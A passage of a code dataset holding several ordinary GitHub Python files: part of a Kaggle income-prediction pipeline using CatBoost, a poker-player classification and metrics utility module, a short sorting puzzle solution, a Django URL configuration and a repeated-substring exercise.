df_prof3.groupby('Words',as_index = False).agg({'Income in EUR':['mean','var','count']})\n df_prof4.columns = df_prof4.columns.droplevel(level=0)\n df_prof4['var_sum'] = df_prof4['var'] * df_prof4['count']\n df_prof4 = df_prof4.drop(columns = ['count'])\n df_prof4.columns = ['Words','mean','var','count']\n\n df_prof4 = df_prof4[df_prof4['Words'] != ' ']\n df_prof4 = df_prof4[df_prof4['Words'] != '']\n df_prof4 = df_prof4[df_prof4['Words'] != 'and']\n\n df_prof5 = df_prof4.copy()\n\n df_prof5['total_word_count'] = df_prof5['count'].sum()\n\n df_prof5 = df_prof5.sort_values(by = 'count', ascending = False)\n\n df_prof5['cnt_cumsum'] = df_prof5['count'].cumsum()\n\n df_prof5['cum_perc'] = df_prof5['cnt_cumsum']/df_prof5['total_word_count']\n\n df_prof5 = df_prof5[df_prof5['cum_perc'] <= stretch]\n\n# print('Number of Significant words = ')\n# print(df_prof5.shape[0])\n\n sig_words = list(df_prof5['Words'])\n# print('Significant words are')\n# print(sig_words)\n\n extra_cols = []\n for i in sig_words:\n df2['is_'+i] = np.where(df2['Profession'].str.contains(i),'yes','no')\n extra_cols.append('is_'+i)\n \n return df2, extra_cols, sig_words\n\n\n# #### Creating a missing value imputer\n\n# In[9]:\n\n\ndef miss_val_impute(df, cat_vars, num_imp = 'mean'):\n for i in df:\n if i not in cat_vars:\n if num_imp == 'mean':\n x = df[i].mean()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'median':\n x = df[i].median()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'mode':\n x = df[i].mode()\n df[i] = df[i].replace(np.nan,x)\n else:\n df[i] = np.where(df[i].isna(),df[i].mode(),df[i])\n return df\n\ndef mvi(df2, extra_cols):\n df3 = df2.copy()\n cat_vars = ['Gender','Country','Profession','University Degree','Wears Glasses','Hair Color'] + extra_cols\n df3 = miss_val_impute(df3, cat_vars,num_imp = 'median')\n return df3,cat_vars\n\n\n# #### Label Encoding\n\n# In[10]:\n\n\n# dfx = df[df['Profession'].notnull()]\n\n# dfx['Profession'] = dfx['Profession'].str.lower()\n\n# df_prof = dfx['Profession'].str.split(' ', 10, expand=True)\n\n# df_prof['Income in EUR'] = dfx['Income in EUR']\n\n# l = []\n# val = []\n# for i in df_prof.columns[:-1]:\n# df_prof2 = df_prof[df_prof[i].notnull()]\n# m = df_prof2.iloc[:,i].tolist()\n# n = df_prof2['Income in EUR'].tolist()\n# for j in m:\n# l.append(j)\n# for k in n:\n# val.append(k)\n \n# df_prof3 = pd.DataFrame({'Words':l,'Income in EUR':val})\n# df_prof4 = df_prof3.groupby('Words',as_index = False).agg({'Income in EUR':['mean','var','count']})\n# df_prof4.columns = df_prof4.columns.droplevel(level=0)\n# # df_prof4['var_sum'] = df_prof4['var'] * df_prof4['count']\n# df_prof4 = df_prof4.drop(columns = ['count'])\n# df_prof4.columns = ['Words','mean','var']\n# print(df_prof4.head())\n\n# d_prof = {}\n# for i in dfx['Profession'].unique():\n# least_var = 10**20\n# for j in df_prof4['Words'].tolist():\n# if j in i:\n# a = df_prof4[df_prof4['Words'] == j]['var'].tolist()\n# b = df_prof4[df_prof4['Words'] == j]['mean'].tolist()\n# if a[0] < least_var:\n# least_var = a[0]\n# d_prof[i] = b[0]\n\n# df3['Profession2'] = df3['Profession'].map(d_prof)\n# cat_vars.append('Profession2')\n\n\n# In[11]:\n\n\ndef encoder(df3,cat_vars):\n df4 = df3.copy()\n for i in cat_vars:\n mean_encode = df4.groupby(i)['Income in EUR'].mean()\n freq_encode = df4.groupby(i)['Income in EUR'].count()\n df4.loc[:, i] = (df4[i].map(mean_encode)*df4[i].map(freq_encode) + 7*df4['Income in EUR'].mean())/(df4[i].map(freq_encode)+7)\n return df4\n\n\n# In[12]:\n\n\n# area = np.pi*3\n\n# for i in df4.drop(columns = [\"Income in EUR\",'Instance']).columns:\n# x = df4[i]\n# y = df4['Income in EUR']\n# plt.scatter(x, y, s=area, alpha=0.5)\n# plt.xlabel(i)\n# plt.ylabel('Income in EUR')\n# plt.show()\n\n\n# In[13]:\n\n\ndef train_data_prep(df4):\n df = df4.drop(columns = ['Instance'])\n df['Income in EUR2'] = pd.qcut(df['Income in EUR'], 10, labels=False)\n y = df.pop('Income in EUR2')\n X_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.33, random_state=42, stratify=y)\n \n return X_train.drop(columns = ['Income in EUR']), X_train[['Income in EUR']], X_test.drop(columns = ['Income in EUR']), X_test[['Income in EUR']]\n\n\n# In[14]:\n\n\n# clf = RandomForestRegressor(n_estimators=100)\n# clf = clf.fit(X_train, Y_train)\ndef modeller(X_train, Y_train, X_test, Y_test, extra_cols):\n X_train.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n X_test.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n# xg_reg = xgb.XGBRegressor(base_score=0.5, booster='gbtree', colsample_bylevel=1,\n# colsample_bytree=1.0, gamma=0, learning_rate=0.1, max_delta_step=0,\n# max_depth=6, min_child_weight=1.2, missing=None, n_estimators=100,\n# n_jobs=1, nthread=None, objective='reg:linear', random_state=0,\n# reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=None,\n# silent=True, subsample=1)\n# clf = xg_reg.fit(X_train, Y_train)\n \n clf = CatBoostRegressor(iterations=1400,\n learning_rate=0.02,\n depth=6,\n eval_metric='RMSE',\n# silent = True,\n random_seed = 23,\n bagging_temperature = 0.2,\n od_type='Iter',\n metric_period = 250,\n od_wait=100)\n clf.fit(X_train, Y_train,\n eval_set=(X_test,Y_test),\n# cat_features=cat_vars_l,\n use_best_model=True,\n verbose=True)\n return clf\n\n\n# In[15]:\n\n\n# X_test.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n# print(clf.score(X_test,Y_test))\n# rms = sqrt(mean_squared_error(Y_test, clf.predict(X_test)))\n# rms\n\n\n# In[16]:\n\n\n# importances = list(clf.feature_importances_)\n# feature_importances = [(feature, round(importance, 2)) for feature, importance in zip(X.columns, importances)]\n# feature_importances = sorted(feature_importances, key = lambda x: x[1], reverse = True)\n# [print('Variable: {:20} Importance: {}'.format(*pair)) for pair in feature_importances]\n\n\n# In[17]:\n\n\n# X.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n# scores = cross_val_score(clf, X, Y, cv=5)\n# print(scores.mean())\n# scores\n\n\n# In[18]:\n\n\ndef result(clf,extra_cols,sig_words,df3,mode='check'):\n if mode == 'check':\n dfkaggle = df_val\n else:\n dfkaggle = pd.read_csv('../Data/tcd ml 2019-20 income prediction test (without labels).csv')\n\n dfkaggle2 = convert_lower(dfkaggle)\n dfkaggle2 = unknown_to_nulls(dfkaggle2)\n dfkaggle2.loc[:,'Wears Glasses'] = dfkaggle2.loc[:,'Wears Glasses'].apply(str)\n dfkaggle2.loc[:,'Wears Glasses'] = np.where(dfkaggle2.loc[:,'Wears Glasses'] == '0', 'No',np.where(dfkaggle2.loc[:,'Wears Glasses'] == '1', 'Yes',dfkaggle2.loc[:,'Wears Glasses']))\n dfkaggle2.loc[:,'Gender'] = dfkaggle2.loc[:,'Gender'].replace('other',np.nan)\n dfkaggle2 = zero_to_nulls(dfkaggle2)\n\n for i in sig_words:\n dfkaggle2['is_'+i] = np.where(dfkaggle2['Profession'].str.contains(i),'yes','no')\n\n def miss_val_impute2(df, cat_vars, num_imp = 'mean'):\n for i in df:\n if i not in cat_vars:\n if num_imp == 'mean':\n x = df3[i].mean()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'median':\n x = df3[i].median()\n df[i] = df[i].replace(np.nan,x)\n if num_imp == 'mode':\n x = df3[i].mode()\n df[i] = df[i].replace(np.nan,x)\n else:\n df[i] = np.where(df[i].isna(),df3[i].mode(),df[i])\n return df\n\n dfkaggle3 = dfkaggle2.copy()\n cat_vars = ['Gender','Country','Profession','University Degree','Wears Glasses','Hair Color'] + extra_cols\n \n if mode == 'check':\n dfkaggle3 = dfkaggle3.drop(columns = 'Income in EUR')\n else:\n dfkaggle3 = dfkaggle3.drop(columns = 'Income')\n \n dfkaggle3 = miss_val_impute2(dfkaggle3, cat_vars,num_imp = 'median')\n dfkaggle3.head()\n\n dfkaggle4 = dfkaggle3.copy()\n for i in cat_vars:\n mean_encode = df3.groupby(i)['Income in EUR'].mean()\n# dfkaggle4.loc[:, i] = dfkaggle4[i].map(mean_encode)\n freq_encode = df3.groupby(i)['Income in EUR'].count()\n dfkaggle4.loc[:, i] = (dfkaggle4[i].map(mean_encode)*dfkaggle4[i].map(freq_encode) + 7*df3['Income in EUR'].mean())/(dfkaggle4[i].map(freq_encode)+7)\n dfkaggle4.head()\n\n data_explore(dfkaggle4)\n dfkaggle4 = dfkaggle4.drop(columns = 'Instance')\n\n for i in dfkaggle4:\n dfkaggle4[i] = np.where(dfkaggle4[i].isna(),df4[i].median(),dfkaggle4[i])\n\n # dfkaggle4 = dfkaggle4.fillna(0)\n\n dfkaggle4.columns = ['Year_of_Record','Gender','Age','Country','Size_of_City','Profession','University_Degree','Wears_Glasses','Hair_Color','Body_Height_cm'] + extra_cols\n\n dfkaggle4['Income in EUR'] = clf.predict(dfkaggle4)\n dfkaggle4['Instance'] = dfkaggle3['Instance']\n dfkaggle4 = dfkaggle4[['Instance','Income in EUR']]\n# dfkaggle4.columns = ['Instance','Income in EUR']\n \n if mode == 'check':\n rms = sqrt(mean_squared_error(list(df_val['Income in EUR']), list(dfkaggle4['Income in EUR'])))\n return rms\n else:\n return dfkaggle4\n\n\n# In[19]:\n\n\n# # ### Splitting dataframe\nscores = []\noutput = pd.DataFrame()\niters = []\nfor i in range(15):\n df_val, df = train_test()\n df = rem_outliers(df)\n df2 = cleaner1(df)\n df2, extra_cols, sig_words = profession_cleaner(df, df2, stretch = 0.2)\n df3,cat_vars = mvi(df2, extra_cols)\n df4 = encoder(df3,cat_vars)\n X_train, Y_train, X_test, Y_test = train_data_prep(df4)\n clf = modeller(X_train, Y_train, X_test, Y_test, extra_cols)\n \n rms = result(clf,extra_cols,sig_words,df3,mode = 'check')\n print('iteration = '+str(i)+' score = '+str(rms))\n joblib.dump(clf, 'Models for v10 KFolds/clf'+str(i))\n \n if rms <= 60000:\n scores.append(rms)\n print('iteration = '+str(i)+' score = '+str(rms))\n res = result(clf,extra_cols,sig_words,df3,mode = 'kaggle')\n output = output.append(res)\n print('Completed iteration : ' + str(i))\n iters.append(i)\n \nprint('Mean score = ' + str(sum(scores)/len(scores)))\n\n\n# In[22]:\n\n\noutput2 = output.copy()\n# # output2\noutput3 = output2.groupby(['Instance']).mean()\noutput3.head()\noutput3.to_csv('test15 catboost.csv')\n\n","repo_name":"amittal-tcd/TCD-work","sub_path":"Sem 1/Machine Learning/Income Prediction Kaggle Competition/Income Prediction_v15 C1DC75369657495E4C5B.py","file_name":"Income Prediction_v15 C1DC75369657495E4C5B.py","file_ext":"py","file_size_in_byte":17697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19047484693","text":"import seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport itertools\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.tree import export_graphviz\nfrom IPython.display import Image \nfrom pydotplus import graph_from_dot_data\nfrom xgboost import plot_tree\nfrom pprint import pprint\n\ndef plot_confusion_matrix(labels, preds_proba, classes, threshold=0.5, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n \"\"\"Calculate the confusion matrix for a determined threshold and plot it in a nicely formatted way\n\n Parameters:\n labels (list): List of labels (class)\n preds_proba (list): List of predicted probabilities\n threshold (float): Threshold\n normalize (bool): normalize True will will plot using percentages, normalize False will plot using raw values\n title (str): Plot's title\n cmap (str): Color Map\n return_cm (bool): return the non-normalised confusion matrix if set to True\n\n\n Returns:\n float:Threshold optimal value\n\n \"\"\"\n preds = preds_proba_to_preds_class(preds_proba,threshold)\n cm_std = confusion_matrix(labels, preds)\n # Check if normalize is set to True\n # If so, normalize the raw confusion matrix before visualizing\n if normalize:\n cm = cm_std.astype('float') / cm_std.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n cm = cm_std\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, cmap=cmap)\n \n # Add title and axis labels \n plt.title(title)\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n # Add appropriate axis scales\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n \n # Text formatting\n fmt = '.2f' if normalize else 'd'\n # Add labels to each cell\n thresh = cm.max() / 2.\n # Here we iterate through the confusion matrix and append labels to our visualization \n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment='center',\n color='white' if cm[i, j] > thresh else 'black')\n \n # Add a legend\n plt.colorbar()\n plt.show()\n return cm_std\n \ndef find_best_k(X_train, y_train, X_test, y_test, min_k=1, max_k=25):\n \"\"\"Find the best value for K in a certain range of values for KNeighborsClassifier\n\n Parameters:\n X_train (float): The percentage of positives in the population\n y_train (float): The Cost of false positives minus the cost of true negatives\n X_test (float): The Cost of false negatives minus the cost of true positives\n y_test (float): True positive rate\n min_k (float): Minimum value for K\n max_k (float): Maximum value for K\n\n\n Returns:\n int: Best value for K\n\n \"\"\"\n best_k = 0\n best_score = 0.0\n for k in range(min_k, max_k+1, 2):\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train, y_train)\n preds = knn.predict(X_test)\n f1 = f1_score(y_test, preds)\n if f1 > best_score:\n best_k = k\n best_score = f1\n print(\"Best Value for k: {}\".format(best_k))\n print(\"F1-Score: {}\".format(best_score))\n\ndef preds_proba_to_preds_class(preds_proba,threshold):\n \"\"\"Transform prediction probabilities into classes (booleans) using a determined threshold\n\n Parameters:\n preds_proba (list): List of probabilities\n threshold (float): Threshold\n\n Returns:\n classes (list): List of classes\n\n \"\"\"\n return [True if pred > threshold else False for pred in preds_proba]\n\ndef threshold_selection(prevalence, CostFP_minus_CostTN, CostFN_minus_CostTP, y, y_hat):\n \"\"\"Calculate the optimal treshold depending on prevalence, costs, true positive rates and false positive rates\n \n Args:\n prevalence (float): The percentage of positives in the population\n CostFP_minus_CostTN (float): The cost of false positives minus the cost of true negatives\n CostFN_minus_CostTP (float): The cost of false negatives minus the cost of true positives\n y (list): True labels (classes)\n y_hat (list): Predicted proba for labels (classes)\n \n Returns:\n [float]: Best threshold\n \"\"\"\n fpr, tpr, thresholds = roc_curve(y, y_hat)\n m = ((1 - prevalence) / prevalence) * ((CostFP_minus_CostTN) / (CostFN_minus_CostTP))\n fm_thresholds = []\n for i in range(len(fpr)):\n fm = tpr[i] - (m * fpr[i])\n fm_thresholds.append((thresholds[i], fm))\n fm_thresholds = sorted(fm_thresholds, key=lambda fm_value: fm_value[1], reverse=True)\n return fm_thresholds[0][0]\n\ndef metrics(labels, preds_proba, print_metrics=True, plot=False, threshold=0.5, rounded=4):\n \"\"\"Plot the ROC curve, calculate and print AUC, Precision, Recall, Accuracy and F1 scores\n\n Parameters:\n labels (list): List of labels (classes)\n preds_proba (list): List of predicted probabilities\n print_metrics (bool): Print the metrics if parameter set to True\n plot (bool): Plot the ROC curve if parameter set to True\n threshold (float): Threshold (purely as information)\n rounded (int): The number of digits for the scores\n\n\n Returns:\n scores (dict): Return a dictionnary of scores (AUC, Precision, Recall, Accuracy and F1)\n\n \"\"\"\n \n\n test_fpr, test_tpr, test_thresholds = roc_curve(labels, preds_proba)\n roc_auc = auc(test_fpr, test_tpr)\n preds = preds_proba_to_preds_class(preds_proba,threshold)\n precision = precision_score(labels, preds)\n recall = recall_score(labels, preds)\n accuracy = accuracy_score(labels, preds)\n f1 = f1_score(labels, preds)\n if plot:\n sns.set_style('darkgrid', {'axes.facecolor': '0.9'})\n plt.figure(figsize=(10, 8))\n lw = 2\n plt.plot(test_fpr, test_tpr, color='darkorange',\n lw=lw, label='ROC curve')\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.yticks([i/20.0 for i in range(21)])\n plt.xticks([i/20.0 for i in range(21)])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic (ROC) Curve')\n plt.legend(loc='lower right')\n plt.show()\n if print_metrics:\n print(f\"ROC AUC Score: {roc_auc}\\n\")\n print(f\"------- Metrics for threshold {threshold} -------\")\n print(f\"- Precision Score: {precision}\")\n print(f\"- Recall Score: {recall}\")\n print(f\"- Accuracy Score: {accuracy}\")\n print(f\"- F1 Score: {f1}\\n\")\n else:\n return {\"roc_auc\":roc_auc, \"precision\":precision, \"recall\":recall, \"accuracy\":accuracy, \"f1\":f1}\n\n\ndef get_roc_auc(y_test, y_hat_test):\n \"\"\"Return the ROC AUC value\n\n Parameters:\n y_test (list): Target Labels\n y_hat_test (list): Predicted target labels\n\n Returns:\n float:Area Under The Curve pof Receiver Operating Characteristics\n\n \"\"\"\n test_fpr, test_tpr, test_thresholds = roc_curve(y_test, y_hat_test)\n roc_auc = auc(test_fpr, test_tpr)\n return roc_auc\n\ndef print_corr(df, pct=0):\n \"\"\"Prints the multicollinearity heatmap with the option of setting a minimum multicollinearity percentage\n\n Parameters:\n df (pandas dataframe): Pandas DataFrame\n pct (float): Optional minimum multicollinearity percentage (multicollinearity lower than the value of the variable \"pct\" will not be shown)\n\n Returns:\n void:This function does not return values\n\n \"\"\"\n \n sns.set(style=\"white\")\n\n # Compute the correlation matrix\n if pct == 0:\n corr = df.corr()\n else:\n corr = abs(df.corr()) > pct\n\n # Generate a mask for the upper triangle\n mask = np.zeros_like(corr, dtype=np.bool)\n mask[np.triu_indices_from(mask)] = True\n\n # Set up the matplotlib figure\n f, ax = plt.subplots(figsize=(11, 9))\n\n # Generate a custom diverging colormap\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n\n # Draw the heatmap with the mask and correct aspect ratio\n sns.heatmap(corr, mask=mask, cmap=cmap, vmax=1, center=0, square=True, linewidths=.5, cbar_kws={\"shrink\": .5})\n\n\ndef prediction(X, model, stakes=\"default\"):\n \"\"\"The function will predict the class of a player depending on his stats and on the stakes of the game we are playing\n \n Args:\n X (dataframe): Player's stat\n model (classifier object): A fitted classifier model\n stakes (str): Stakes of the game (small or high)\n \"\"\"\n \n #Defining thresholds\n thresholds = {\"default\":0.5, \"small\":0.696, \"high\":0.326}\n\n # Chosing default threshold if value entered for stakes ins't a key of the threshold dictionnary\n if stakes not in thresholds.keys():\n stakes = \"default\"\n print(f\"The value entered for stakes isn't recognized, therefore threshold default value: {thresholds[stakes]} was chosen\")\n\n # Chosing threshold\n threshold = thresholds[stakes]\n\n # Check and transform the format of the data if needed\n if not isinstance(X, pd.DataFrame):\n if isinstance(X, pd.Series):\n X = X.to_frame().T\n else:\n X = pd.DataFrame.from_dict(X)\n\n # Rename columns\n X.columns = X.columns.str.replace('\\n',' ')\n X.columns = X.columns.str.replace(' ','_')\n\n # Saving name\n player_name = X.Player_Name.iloc[0]\n\n # Drop useless columns\n for col in ['Player_Name', 'Site', \"Hands\", \"Net_Won\"]:\n if col in X.columns:\n X.drop([col], axis=1, inplace=True)\n\n # Add polynomials and interactions to the dataframe\n features_order = ['VP$IP',\n 'W$WSF%',\n 'WTSD%',\n 'Flop_CBet%',\n 'Turn_CBet%',\n 'River_CBet%',\n 'Fold_to_Flop_Cbet',\n 'Fold_to_River_CBet',\n 'Raise_Flop_Cbet',\n 'Raise_River_CBet',\n 'Call_Two_Raisers',\n 'vs_3Bet_Fold',\n 'vs_3Bet_Call',\n 'vs_3Bet_Raise',\n 'vs_4Bet_Fold',\n 'vs_4Bet_Call',\n 'vs_4Bet_Raise',\n 'WTSD%_*_Won_$_at_SD',\n 'Won_$_at_SD_*_River_CBet%',\n 'Won_$_at_SD_*_Raise_Two_Raisers',\n 'Won_$_at_SD_*_vs_4Bet_Call',\n 'VP$IP_*_Flop_CBet%',\n 'VP$IP_*_Fold_to_River_CBet',\n 'PFR_*_River_CBet%',\n 'PFR_*_Fold_to_Turn_CBet',\n 'Squeeze',\n 'Squeeze_^2',\n 'Squeeze_^3',\n 'Squeeze_^4',\n 'Postflop_Agg%',\n 'Postflop_Agg%_^2',\n 'Postflop_Agg%_^3',\n 'Postflop_Agg%_^4',\n 'Won_$_at_SD',\n 'Won_$_at_SD_^2',\n 'Won_$_at_SD_^3',\n 'Won_$_at_SD_^4',\n 'Raise_Turn_CBet',\n 'Raise_Turn_CBet_^2',\n 'PFR_*_Flop_CBet%',\n 'PFR_*_Flop_CBet%_^2',\n 'PFR_*_Flop_CBet%_^3',\n 'VP$IP_*_Won_$_at_SD',\n 'VP$IP_*_Won_$_at_SD_^2',\n 'VP$IP_*_Won_$_at_SD_^3',\n 'Raise_Two_Raisers',\n 'Raise_Two_Raisers_^2',\n 'Raise_Two_Raisers_^3',\n 'Raise_Two_Raisers_^4',\n 'PFR',\n 'PFR_^2',\n 'PFR_^3',\n 'Fold_to_Turn_CBet',\n 'Fold_to_Turn_CBet_^2',\n 'Fold_to_Turn_CBet_^3',\n '3Bet',\n '3Bet_^2',\n '3Bet_^3']\n\n # Recreating interactions features\n for feature in features_order:\n if \"*\" in feature and \"^\" not in feature:\n features = feature.split(\"_*_\")\n X[feature] = np.array(X[features[0]]) * np.array(X[features[1]])\n\n # Recreating polynomials features\n for feature in features_order:\n if feature[-2:-1] == \"^\":\n feature_to_poly = feature[:-3]\n exp = feature[-1]\n X[feature] = np.array(X[feature_to_poly]) ** int(exp)\n \n # Set the X columns in the right order\n X = X[features_order]\n\n # Generate prediction probabilities\n preds_proba = np.array(model.predict_proba(X))[:,1]\n pred_class = preds_proba_to_preds_class(preds_proba, threshold)\n pred_class = pred_class[0]\n if pred_class == True:\n pred_class = \"Winning Player\"\n else:\n pred_class = \"Losing Player\"\n pprint(f\"Playing a {stakes} stakes game we'll consider {player_name} a {pred_class}\")\n\nclass Prediction():\n \"\"\"This Class will predict the class (winning or losing) of a player depending on his stats and on the stakes of the game we are playing\n \n Args:\n X (dataframe): Player's stat\n model (classifier object): A fitted classifier model\n stakes (str): Stakes of the game (small or high)\n \"\"\"\n \n def __init__(self, X, model, stakes=\"default\"):\n self.X = X\n self.model = model\n self.stakes = stakes\n self.thresholds = {\"default\":0.5, \"small\":0.696, \"high\":0.326}\n self.threshold = None\n\n def get_stakes(self):\n return self.stakes\n\n def set_stakes(self, stakes):\n self.stakes = stakes\n\n def get_thresholds(self):\n return self.thresholds\n\n def set_thresholds(self, thresholds_dict):\n self.thresholds = thresholds_dict\n \n def set_threshold(self, threshold_tuple):\n self.thresholds[threshold_tuple[0]] = threshold_tuple[1]\n\n def predict(self):\n # Chosing default threshold if value entered for stakes ins't a key of the threshold dictionnary\n if self.stakes not in self.thresholds.keys():\n self.stakes = \"default\"\n print(f\"The value entered for stakes isn't recognized, therefore threshold default value: {self.thresholds[self.stakes]} was chosen\")\n\n # Chosing threshold\n self.threshold = self.thresholds[self.stakes]\n\n # Check and transform the format of the data if needed\n if not isinstance(self.X, pd.DataFrame):\n if isinstance(self.X, pd.Series):\n self.X = self.X.to_frame().T\n else:\n self.X = pd.DataFrame.from_dict(self.X)\n\n # Rename columns\n self.X.columns = self.X.columns.str.replace('\\n',' ')\n self.X.columns = self.X.columns.str.replace(' ','_')\n\n # Saving name\n player_name = self.X.Player_Name.iloc[0]\n\n # Drop useless columns\n for col in ['Player_Name', 'Site', \"Hands\", \"Net_Won\"]:\n if col in self.X.columns:\n self.X.drop([col], axis=1, inplace=True)\n\n # Add polynomials and interactions to the dataframe\n features_order = ['VP$IP',\n 'W$WSF%',\n 'WTSD%',\n 'Flop_CBet%',\n 'Turn_CBet%',\n 'River_CBet%',\n 'Fold_to_Flop_Cbet',\n 'Fold_to_River_CBet',\n 'Raise_Flop_Cbet',\n 'Raise_River_CBet',\n 'Call_Two_Raisers',\n 'vs_3Bet_Fold',\n 'vs_3Bet_Call',\n 'vs_3Bet_Raise',\n 'vs_4Bet_Fold',\n 'vs_4Bet_Call',\n 'vs_4Bet_Raise',\n 'WTSD%_*_Won_$_at_SD',\n 'Won_$_at_SD_*_River_CBet%',\n 'Won_$_at_SD_*_Raise_Two_Raisers',\n 'Won_$_at_SD_*_vs_4Bet_Call',\n 'VP$IP_*_Flop_CBet%',\n 'VP$IP_*_Fold_to_River_CBet',\n 'PFR_*_River_CBet%',\n 'PFR_*_Fold_to_Turn_CBet',\n 'Squeeze',\n 'Squeeze_^2',\n 'Squeeze_^3',\n 'Squeeze_^4',\n 'Postflop_Agg%',\n 'Postflop_Agg%_^2',\n 'Postflop_Agg%_^3',\n 'Postflop_Agg%_^4',\n 'Won_$_at_SD',\n 'Won_$_at_SD_^2',\n 'Won_$_at_SD_^3',\n 'Won_$_at_SD_^4',\n 'Raise_Turn_CBet',\n 'Raise_Turn_CBet_^2',\n 'PFR_*_Flop_CBet%',\n 'PFR_*_Flop_CBet%_^2',\n 'PFR_*_Flop_CBet%_^3',\n 'VP$IP_*_Won_$_at_SD',\n 'VP$IP_*_Won_$_at_SD_^2',\n 'VP$IP_*_Won_$_at_SD_^3',\n 'Raise_Two_Raisers',\n 'Raise_Two_Raisers_^2',\n 'Raise_Two_Raisers_^3',\n 'Raise_Two_Raisers_^4',\n 'PFR',\n 'PFR_^2',\n 'PFR_^3',\n 'Fold_to_Turn_CBet',\n 'Fold_to_Turn_CBet_^2',\n 'Fold_to_Turn_CBet_^3',\n '3Bet',\n '3Bet_^2',\n '3Bet_^3']\n\n # Recreating interactions features\n for feature in features_order:\n if \"*\" in feature and \"^\" not in feature:\n features = feature.split(\"_*_\")\n self.X[feature] = np.array(self.X[features[0]]) * np.array(self.X[features[1]])\n\n # Recreating polynomials features\n for feature in features_order:\n if feature[-2:-1] == \"^\":\n feature_to_poly = feature[:-3]\n exp = feature[-1]\n self.X[feature] = np.array(self.X[feature_to_poly]) ** int(exp)\n \n # Set the X columns in the right order\n self.X = self.X[features_order]\n\n # Generate prediction probabilities\n preds_proba = np.array(self.model.predict_proba(self.X))[:,1]\n pred_class = preds_proba_to_preds_class(preds_proba, self.threshold)\n pred_class = pred_class[0]\n if pred_class == True:\n pred_class = \"Winning Player\"\n else:\n pred_class = \"Losing Player\"\n pprint(f\"Playing a {self.stakes} stakes game we'll consider {player_name} a {pred_class}\")","repo_name":"locsta/Poker-Player-Classifier","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":18769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44462642447","text":"import sys\nimport functools\ninput = sys.stdin.readline\nN = int(input())\narr = []\nresult = 0\nfor i in range(N):\n arr.append(int(input()))\nif N > 2:\n arr.sort()\n *a, b, c = arr\n num1 = sum(a) + (b * c)\n a, b, *c = arr\n num2 = sum(c) + (a * b)\n print(max(sum(arr), num1, num2))\nelse:\n print(functools.reduce(lambda a,b: a*b,arr))","repo_name":"joohyun333/programmers","sub_path":"백준/정렬/수묶기.py","file_name":"수묶기.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73184953068","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\n\n\nadmin.autodiscover()\nif settings.DEBUG:\n\turlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'gerenciador.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n # (r'^$', 'agenda.views.index'),\n (r'^$', 'agenda.views.lista'),\n (r'^adiciona/$', 'agenda.views.adiciona'),\n (r'^item/(?P<nr_item>\\d+)/$', 'agenda.views.item'),\n (r'^media/(?P<path>.*)$', 'django.views.static.serve',{'document_root': settings.MEDIA_ROOT}),\n)\n","repo_name":"robesson/agenda","sub_path":"gerenciador/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23014804388","text":"'''\n Given a non-empty string check if it can be constructed by taking a substring of it\n and appending multiple copies of the substring together.\n You may assume the given string consists of lowercase English letters only and its length will not exceed 10000.\n\n Input: \"abab\"\n Output: True\n Explanation: It's the substring \"ab\" twice.\n\n Input: \"aba\"\n Output: False\n'''\n\n# Idea here is : For a pattern to occur all characters must be present equal number of times\n# aaabbb --> This breaks the idea or abccba --> abc cba\n# which means you need somthing along with it\n# \ndef is_repeated_substring(input_string):\n i = 1\n length = len(input_string)\n while i < length:\n if length % i == 0:\n pattern = input_string[:i]\n times = length // i\n if pattern * times == input_string:\n return True\n \n i += 1\n \n return False\n\ninput_string = str(input('Enter input string :: '))\nprint('Can this string be formed by repeating its patterns :: {}'.format(is_repeated_substring(input_string)))\n","repo_name":"luthraG/ds-algo-war","sub_path":"general-practice/14_09_2019/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 